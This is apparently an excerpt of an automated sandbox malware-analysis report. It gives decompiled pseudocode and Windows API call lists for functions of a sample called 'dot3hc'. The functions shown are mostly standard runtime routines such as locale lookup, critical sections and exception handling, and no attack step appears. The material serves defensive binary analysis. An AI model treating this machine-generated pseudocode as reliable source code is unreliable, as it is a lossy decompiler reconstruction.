                                                      • Instruction Fuzzy Hash: 5721C6B0A10209EBDF14CFD4C984BAEBBB9BF44304F548699D90BAB245C774AA40EB55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E00404429(void* __ecx) {
                                                      				signed int _v8;
                                                      				char _v16;
                                                      				char _v18;
                                                      				char _v280;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t11;
                                                      				long _t14;
                                                      				intOrPtr _t15;
                                                      				char* _t18;
                                                      				intOrPtr _t21;
                                                      				intOrPtr _t33;
                                                      				signed int _t36;
                                                      
                                                      				_t11 =  *0x443590; // 0x8ffedb05
                                                      				_v8 = _t11 ^ _t36;
                                                      				_t35 = 0x104;
                                                      				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
                                                      				if(_t14 == 0 || _t14 == 0x104) {
                                                      					L4:
                                                      					_t15 = 0;
                                                      					__eflags = 0;
                                                      				} else {
                                                      					_t18 = PathFindExtensionA( &_v280);
                                                      					_t35 = "%s.dll";
                                                      					asm("movsd");
                                                      					asm("movsw");
                                                      					_t32 =  &_v280;
                                                      					_t41 = _t18 -  &_v280 + 7 - 0x106;
                                                      					asm("movsb");
                                                      					_t33 = _t33;
                                                      					if(_t18 -  &_v280 + 7 > 0x106) {
                                                      						goto L4;
                                                      					} else {
                                                      						E00403EBB(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
                                                      						_t15 = E00404142(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
                                                      					}
                                                      				}
                                                      				return E0041E5DF(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
                                                      			}


                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0040444F
                                                      • PathFindExtensionA.SHLWAPI(?), ref: 00404465
                                                        • Part of subcall function 00403EBB: _strcpy_s.LIBCMT ref: 00403EC7
                                                        • Part of subcall function 00404142: __EH_prolog3.LIBCMT ref: 00404161
                                                        • Part of subcall function 00404142: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 00404182
                                                        • Part of subcall function 00404142: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00404193
                                                        • Part of subcall function 00404142: ConvertDefaultLocale.KERNELBASE(?), ref: 004041C9
                                                        • Part of subcall function 00404142: ConvertDefaultLocale.KERNELBASE(?), ref: 004041D1
                                                        • Part of subcall function 00404142: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 004041E5
                                                        • Part of subcall function 00404142: ConvertDefaultLocale.KERNEL32(?), ref: 00404209
                                                        • Part of subcall function 00404142: ConvertDefaultLocale.KERNEL32(000003FF), ref: 0040420F
                                                        • Part of subcall function 00404142: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00404248
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                      • String ID: %s.dll
                                                      • API String ID: 3444012488-3668843792
                                                      • Opcode ID: 8e7e12c1d50eaefc46e865cbfd3ee717ae355514b69d53891cd43f448e5456b4
                                                      • Instruction ID: 19a3236b257a23e403f0296e6cb30a89f0e944724a7da86974bbd27a45870086
                                                      • Opcode Fuzzy Hash: 8e7e12c1d50eaefc46e865cbfd3ee717ae355514b69d53891cd43f448e5456b4
                                                      • Instruction Fuzzy Hash: B50179B19001186FCB19DF64DD56AEF77B9EF44704F4101BABA06F3180EA789F448AA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E0041A311(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* _t29;
                                                      				void* _t47;
                                                      				void* _t51;
                                                      				void* _t53;
                                                      				void* _t54;
                                                      
                                                      				_t54 = __eflags;
                                                      				_t47 = __edx;
                                                      				_push(0xc);
                                                      				E0041F6EA(E00433470, __ebx, __edi, __esi);
                                                      				_t51 = E0040DB94(__ebx, __edi, __esi, _t54);
                                                      				E0040FA7F(__ebx, _t51, _t53, 1);
                                                      				_t2 = _t51 + 0x34; // 0x34
                                                      				_t49 = _t2;
                                                      				 *((intOrPtr*)(_t53 - 0x14)) = 0;
                                                      				E0040FF4A(_t2, _t53 - 0x10, 0x436e68, _t53 - 0x14);
                                                      				 *((intOrPtr*)(_t53 - 4)) = 0;
                                                      				while( *((intOrPtr*)( *(_t53 - 0x10) - 0xc)) != 0) {
                                                      					UnregisterClassA( *(_t53 - 0x10),  *(E0040DB94(0, _t49, 0x436e68, __eflags) + 8));
                                                      					_t29 = E0040FF4A(_t49, _t53 - 0x18, 0x436e68, _t53 - 0x14);
                                                      					 *((char*)(_t53 - 4)) = 1;
                                                      					E004071CF(_t53 - 0x10, _t53, _t29);
                                                      					__eflags =  *((intOrPtr*)(_t53 - 0x18)) + 0xfffffff0;
                                                      					 *((char*)(_t53 - 4)) = 0;
                                                      					E00403036( *((intOrPtr*)(_t53 - 0x18)) + 0xfffffff0, _t47);
                                                      				}
                                                      				E00402C20(_t49);
                                                      				E0040FAEC(1);
                                                      				return E0041F7C2(E00403036( &(( *(_t53 - 0x10))[0xfffffffffffffff0]), _t47));
                                                      			}









                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 0041A318
                                                        • Part of subcall function 0040FA7F: EnterCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FABB
                                                        • Part of subcall function 0040FA7F: InitializeCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FACA
                                                        • Part of subcall function 0040FA7F: LeaveCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAD7
                                                        • Part of subcall function 0040FA7F: EnterCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAE3
                                                      • UnregisterClassA.USER32 ref: 0041A358
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$Enter$ClassH_prolog3InitializeLeaveUnregister
                                                      • String ID: hnC
                                                      • API String ID: 2524309216-2905478537
                                                      • Opcode ID: ffcc6aad4f89ebf377f4c376c63438c322617fcf0fa9e5959b7b804a15e635af
                                                      • Instruction ID: dc9c157aa842fe30cd6fe9b5929375e780ac80eaa54db6f8b7d68f330885adc6
                                                      • Opcode Fuzzy Hash: ffcc6aad4f89ebf377f4c376c63438c322617fcf0fa9e5959b7b804a15e635af
                                                      • Instruction Fuzzy Hash: 7611737190110A9FCB10EBE5C851AEEB779AF44308F00057FB112B72D2CA3C6A49CB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 69%
                                                      			E00402F17(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                      				char _v8;
                                                      				char _v16;
                                                      				char _v24;
                                                      				intOrPtr _v36;
                                                      				intOrPtr _t10;
                                                      				intOrPtr _t20;
                                                      				void* _t22;
                                                      				void* _t23;
                                                      				intOrPtr _t24;
                                                      				void* _t25;
                                                      				void* _t26;
                                                      				void* _t27;
                                                      				void* _t28;
                                                      				void* _t30;
                                                      
                                                      				_t26 = __esi;
                                                      				_t25 = __edi;
                                                      				_t23 = __ecx;
                                                      				_t22 = __ebx;
                                                      				_t10 = _a4;
                                                      				if(_t10 == 0) {
                                                      					L7:
                                                      					return _t10;
                                                      				} else {
                                                      					if(_t10 == 0xc) {
                                                      						_push(_t27);
                                                      						_t28 = _t30;
                                                      						_push(__ecx);
                                                      						_v8 = 0x442350;
                                                      						E0041F7F4( &_v8, 0x43c4ec);
                                                      						asm("int3");
                                                      						_push(_t28);
                                                      						_t27 = _t30;
                                                      						_push(_t23);
                                                      						_t4 =  &_v16; // 0x442350
                                                      						_v16 = 0x4423e8;
                                                      						E0041F7F4(_t4, 0x43c54c);
                                                      						asm("int3");
                                                      						goto L10;
                                                      					} else {
                                                      						if(_t10 == 0x16 || _t10 == 0x22 || _t10 != 0x50) {
                                                      							L10:
                                                      							_push(_t27);
                                                      							_push(_t23);
                                                      							_t6 =  &_v24; // 0x4423e8
                                                      							_v24 = 0x442480;
                                                      							E0041F7F4(_t6, 0x43c590);
                                                      							asm("int3");
                                                      							_push(4);
                                                      							E0041F6EA(E00431BFC, _t22, _t25, _t26);
                                                      							_t24 = E0040F014(0x104);
                                                      							_v36 = _t24;
                                                      							_t20 = 0;
                                                      							_v24 = 0;
                                                      							if(_t24 != 0) {
                                                      								_t20 = E0040D519(_t24);
                                                      							}
                                                      							return E0041F7C2(_t20);
                                                      						} else {
                                                      							goto L7;
                                                      						}
                                                      					}
                                                      				}
                                                      			}


















                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Exception@8H_prolog3Throw
                                                      • String ID: #D
                                                      • API String ID: 3670251406-724133492
                                                      • Opcode ID: 85853aadfd074157ec7116a43067f9815513aa3ef37de8bdfc9c1c2a10bf49d8
                                                      • Instruction ID: b0f2db476828d076c5aa5a1c3ccda07ec6cbf835b824b1e618174a28debf0169
                                                      • Opcode Fuzzy Hash: 85853aadfd074157ec7116a43067f9815513aa3ef37de8bdfc9c1c2a10bf49d8
                                                      • Instruction Fuzzy Hash: 98F059B4210202ABDF24EBA9455956F21A89B48748F60487BF101F22C1E6BCCA80A62E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E004127B4(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* _t35;
                                                      				void* _t36;
                                                      
                                                      				_t36 = __eflags;
                                                      				_push(4);
                                                      				E0041F6EA(E00432BE0, __ebx, __edi, __esi);
                                                      				 *((intOrPtr*)(_t35 - 0x10)) = __ecx;
                                                      				E004048ED(__ecx, _t36);
                                                      				 *((intOrPtr*)(_t35 - 4)) = 0;
                                                      				 *((intOrPtr*)(__ecx)) = 0x43688c;
                                                      				 *((intOrPtr*)(__ecx + 0x20)) =  *((intOrPtr*)(_t35 + 8));
                                                      				E00419FBF(__ecx + 0x24, 0xa);
                                                      				 *((char*)(_t35 - 4)) = 1;
                                                      				E00412091(__ecx + 0x40, 0xa);
                                                      				 *(__ecx + 0x5c) =  *(__ecx + 0x5c) | 0xffffffff;
                                                      				 *(__ecx + 0x60) =  *(__ecx + 0x60) | 0xffffffff;
                                                      				 *((intOrPtr*)(__ecx + 0x64)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x68)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x6c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x70)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x74)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x78)) = 0x436954;
                                                      				 *((intOrPtr*)(__ecx + 0x7c)) = 0x436934;
                                                      				return E0041F7C2(__ecx);
                                                      			}






                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3
                                                      • String ID: 4iC$TiC
                                                      • API String ID: 431132790-4008140021
                                                      • Opcode ID: 25bd1f09a88dfbd6e75494a7b2438433112ff2ef9308b05e2517b23215d19696
                                                      • Instruction ID: 5d0dc50055799547b18938ce6c7b49451773700af5d5b110cd1056841da70260
                                                      • Opcode Fuzzy Hash: 25bd1f09a88dfbd6e75494a7b2438433112ff2ef9308b05e2517b23215d19696
                                                      • Instruction Fuzzy Hash: B301FBB1900B419BD720EF2B850564AFFE0BF58714F108A0FE6E6877A1C7B8A645CF49
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E00409BB5(void* __ebx, void* __edi, void* __eflags) {
                                                      				char _v16;
                                                      				intOrPtr _v28;
                                                      				void* __esi;
                                                      				unsigned int _t11;
                                                      				unsigned int _t12;
                                                      				intOrPtr _t20;
                                                      				intOrPtr _t25;
                                                      				void* _t27;
                                                      				void* _t28;
                                                      
                                                      				_push(_t27);
                                                      				_push(0x4037fd);
                                                      				_t28 = E0040F584(__ebx, 0x44642c, __edi, _t27, __eflags);
                                                      				if(_t28 != 0) {
                                                      					 *((intOrPtr*)(_t28 + 0x68)) = GetMessageTime();
                                                      					_t11 = GetMessagePos();
                                                      					_t12 = _t11 >> 0x10;
                                                      					__eflags = _t12;
                                                      					 *((intOrPtr*)(_t28 + 0x70)) = _t12;
                                                      					 *((intOrPtr*)(_t28 + 0x6c)) = _t11;
                                                      					_t8 = _t28 + 0x58; // 0x58
                                                      					return _t8;
                                                      				} else {
                                                      					_push(0x44642c);
                                                      					_t1 =  &_v16; // 0x4423e8
                                                      					_v16 = 0x442480;
                                                      					E0041F7F4(_t1, 0x43c590);
                                                      					asm("int3");
                                                      					_push(4);
                                                      					E0041F6EA(E00431BFC, __ebx, __edi, _t28);
                                                      					_t25 = E0040F014(0x104);
                                                      					_v28 = _t25;
                                                      					_t20 = 0;
                                                      					_v16 = 0;
                                                      					if(_t25 != 0) {
                                                      						_t20 = E0040D519(_t25);
                                                      					}
                                                      					return E0041F7C2(_t20);
                                                      				}
                                                      			}













                                                      APIs
                                                        • Part of subcall function 0040F584: __EH_prolog3.LIBCMT ref: 0040F58B
                                                      • GetMessageTime.USER32(004037FD), ref: 00409BD0
                                                      • GetMessagePos.USER32 ref: 00409BD9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Message$H_prolog3Time
                                                      • String ID: ,dD
                                                      • API String ID: 3041656633-3191229884
                                                      • Opcode ID: 85efacd1186bf4a8b795f4880ecfb808e23b542ecfef8d82670301cc578eca90
                                                      • Instruction ID: 33c9b5c6f293619a4ac6e8f97073239bc9264db69f185d1a93d85d444b44338a
                                                      • Opcode Fuzzy Hash: 85efacd1186bf4a8b795f4880ecfb808e23b542ecfef8d82670301cc578eca90
                                                      • Instruction Fuzzy Hash: 42E046B5800B618BD7219F65A4481AB7AE4EB44366300083FE886E7A50DB38E802CB89
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 73%
                                                      			E004037E3(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				char _v8;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t10;
                                                      				intOrPtr _t14;
                                                      
                                                      				_push(__ecx);
                                                      				_t1 =  &_v8; // 0x4423e8
                                                      				_v8 = 0x442480;
                                                      				E0041F7F4(_t1, 0x43c590);
                                                      				asm("int3");
                                                      				_push(4);
                                                      				E0041F6EA(E00431BFC, __ebx, __edi, __esi);
                                                      				_t14 = E0040F014(0x104);
                                                      				_v20 = _t14;
                                                      				_t10 = 0;
                                                      				_v8 = 0;
                                                      				if(_t14 != 0) {
                                                      					_t10 = E0040D519(_t14);
                                                      				}
                                                      				return E0041F7C2(_t10);
                                                      			}








                                                      APIs
                                                      • __CxxThrowException@8.LIBCMT ref: 004037F7
                                                        • Part of subcall function 0041F7F4: RaiseException.KERNEL32(?,?,?,?), ref: 0041F834
                                                      • __EH_prolog3.LIBCMT ref: 00403804
                                                        • Part of subcall function 0040F014: LocalAlloc.KERNEL32(00000040,00442480,00403813,00000104,00000004,#D,0043C590,?,?,P#D,0043C54C,?,?,000000FF,0043C4EC), ref: 0040F01A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: AllocExceptionException@8H_prolog3LocalRaiseThrow
                                                      • String ID: #D
                                                      • API String ID: 927841988-724133492
                                                      • Opcode ID: 8d38915f9f95c0d2ad1004b0652c1badefd5fb6fe002ff9900cc593122a3e41a
                                                      • Instruction ID: ed78f3ae13bf56099f920655d6bdc6ccae9d51d717f7131c7a3c52a0a811eed1
                                                      • Opcode Fuzzy Hash: 8d38915f9f95c0d2ad1004b0652c1badefd5fb6fe002ff9900cc593122a3e41a
                                                      • Instruction Fuzzy Hash: C8D012B5250208BBD600FBD68947ECD715CDB08708F60547BF310A65D2E7F96A89533D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0041F481(void* __eax, void* __esi) {
                                                      				void* _t13;
                                                      				intOrPtr _t16;
                                                      
                                                      				_t1 = _t13 + 5;
                                                      				 *_t1 =  *((intOrPtr*)(_t13 + 5)) + __esi;
                                                      				_t16 =  *_t1;
                                                      			}






                                                      APIs
                                                      • __FF_MSGBANNER.LIBCMT ref: 0041F489
                                                        • Part of subcall function 0042608D: __NMSG_WRITE.LIBCMT ref: 004260B4
                                                        • Part of subcall function 0042608D: __NMSG_WRITE.LIBCMT ref: 004260BE
                                                      • __NMSG_WRITE.LIBCMT ref: 0041F492
                                                        • Part of subcall function 00425EED: _strcpy_s.LIBCMT ref: 00425F59
                                                        • Part of subcall function 00425EED: __invoke_watson.LIBCMT ref: 00425F6A
                                                        • Part of subcall function 00425EED: GetModuleFileNameA.KERNEL32(00000000,00446DC9,00000104,?,00401B31,00009618), ref: 00425F86
                                                        • Part of subcall function 00425EED: _strcpy_s.LIBCMT ref: 00425F9B
                                                        • Part of subcall function 00425EED: __invoke_watson.LIBCMT ref: 00425FAE
                                                        • Part of subcall function 00425EED: _strlen.LIBCMT ref: 00425FB7
                                                        • Part of subcall function 00425EED: _strlen.LIBCMT ref: 00425FC4
                                                        • Part of subcall function 00425EED: __invoke_watson.LIBCMT ref: 00425FF1
                                                        • Part of subcall function 0041F960: ___crtCorExitProcess.LIBCMT ref: 0041F964
                                                        • Part of subcall function 0041F960: ExitProcess.KERNEL32 ref: 0041F96E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$FileModuleName___crt
                                                      • String ID: |hD
                                                      • API String ID: 4122421049-2118069248
                                                      • Opcode ID: eb0fc998651eac4c209a840669decf8684686f75d9fb24df06ed1deb8ad2b860
                                                      • Instruction ID: e70cd8b630b281eaa6359728f90183fb7d6d66781cb960f2164c911ee12c87e2
                                                      • Opcode Fuzzy Hash: eb0fc998651eac4c209a840669decf8684686f75d9fb24df06ed1deb8ad2b860
                                                      • Instruction Fuzzy Hash: 9EC08CB12147103AD600BB12A80391D22608F00B24F22843FF008140D2DB398580600E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 60%
                                                      			E0040F496(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
                                                      				signed int _v8;
                                                      				void* _t31;
                                                      				intOrPtr _t32;
                                                      				signed int _t38;
                                                      				struct _CRITICAL_SECTION* _t39;
                                                      				intOrPtr* _t44;
                                                      				long* _t47;
                                                      				intOrPtr* _t50;
                                                      
                                                      				_push(__ecx);
                                                      				_t50 = _a4;
                                                      				_t38 = 1;
                                                      				_t47 = __ecx;
                                                      				_v8 = 1;
                                                      				if( *((intOrPtr*)(_t50 + 8)) <= 1) {
                                                      					L10:
                                                      					_t39 =  &(_t47[7]);
                                                      					EnterCriticalSection(_t39);
                                                      					E0040F149( &(_t47[5]), _t50);
                                                      					LeaveCriticalSection(_t39);
                                                      					LocalFree( *(_t50 + 0xc));
                                                      					 *((intOrPtr*)( *_t50))(1);
                                                      					_t31 = TlsSetValue( *_t47, 0);
                                                      					L11:
                                                      					return _t31;
                                                      				} else {
                                                      					goto L1;
                                                      				}
                                                      				do {
                                                      					L1:
                                                      					_t32 = _a8;
                                                      					if(_t32 == 0 ||  *((intOrPtr*)(_t47[4] + 4 + _t38 * 8)) == _t32) {
                                                      						_t44 =  *((intOrPtr*)( *(_t50 + 0xc) + _t38 * 4));
                                                      						if(_t44 != 0) {
                                                      							 *((intOrPtr*)( *_t44))(1);
                                                      						}
                                                      						_t31 =  *(_t50 + 0xc);
                                                      						 *(_t31 + _t38 * 4) =  *(_t31 + _t38 * 4) & 0x00000000;
                                                      					} else {
                                                      						_t31 =  *(_t50 + 0xc);
                                                      						if( *(_t31 + _t38 * 4) != 0) {
                                                      							_v8 = _v8 & 0x00000000;
                                                      						}
                                                      					}
                                                      					_t38 = _t38 + 1;
                                                      				} while (_t38 <  *((intOrPtr*)(_t50 + 8)));
                                                      				if(_v8 == 0) {
                                                      					goto L11;
                                                      				}
                                                      				goto L10;
                                                      			}












                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?), ref: 0040F4F3
                                                      • LeaveCriticalSection.KERNEL32(?,?), ref: 0040F503
                                                      • LocalFree.KERNEL32(?), ref: 0040F50C
                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 0040F51E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                      • String ID:
                                                      • API String ID: 2949335588-0
                                                      • Opcode ID: 9485fa99e575f6fba2d3db258f94ccea0763652fbd318a00cc68c60fcce8b19c
                                                      • Instruction ID: 2b8ded7cbabb034d170cb8e1f6a20b40d79b2ab9c9a6a536b212b17957fcc661
                                                      • Opcode Fuzzy Hash: 9485fa99e575f6fba2d3db258f94ccea0763652fbd318a00cc68c60fcce8b19c
                                                      • Instruction Fuzzy Hash: E8117935600604EFD720CF54D888BAAB7B4FF55315F10843AE9469BAA2CB74B984CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E0040FA7F(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
                                                      				void* __edi;
                                                      				struct _CRITICAL_SECTION* _t4;
                                                      				void* _t7;
                                                      				void* _t10;
                                                      				signed int _t11;
                                                      				void* _t14;
                                                      				intOrPtr* _t15;
                                                      				void* _t17;
                                                      
                                                      				_t17 = __ebp;
                                                      				_t14 = __esi;
                                                      				_t7 = __ebx;
                                                      				_t11 = _a4;
                                                      				_t20 = _t11 - 0x11;
                                                      				if(_t11 >= 0x11) {
                                                      					_t4 = E004037E3(__ebx, _t10, _t11, __esi, _t20);
                                                      				}
                                                      				if( *0x44660c == 0) {
                                                      					_t4 = E0040FA16();
                                                      				}
                                                      				_push(_t7);
                                                      				_push(_t17);
                                                      				_push(_t14);
                                                      				_t15 = 0x4467c0 + _t11 * 4;
                                                      				if( *_t15 == 0) {
                                                      					EnterCriticalSection(0x4467a8);
                                                      					if( *_t15 == 0) {
                                                      						_t4 = 0x446610 + _t11 * 0x18;
                                                      						InitializeCriticalSection(_t4);
                                                      						 *_t15 =  *_t15 + 1;
                                                      					}
                                                      					LeaveCriticalSection(0x4467a8);
                                                      				}
                                                      				EnterCriticalSection(0x446610 + _t11 * 0x18);
                                                      				return _t4;
                                                      			}












                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FABB
                                                      • InitializeCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FACA
                                                      • LeaveCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAD7
                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAE3
                                                        • Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
                                                        • Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
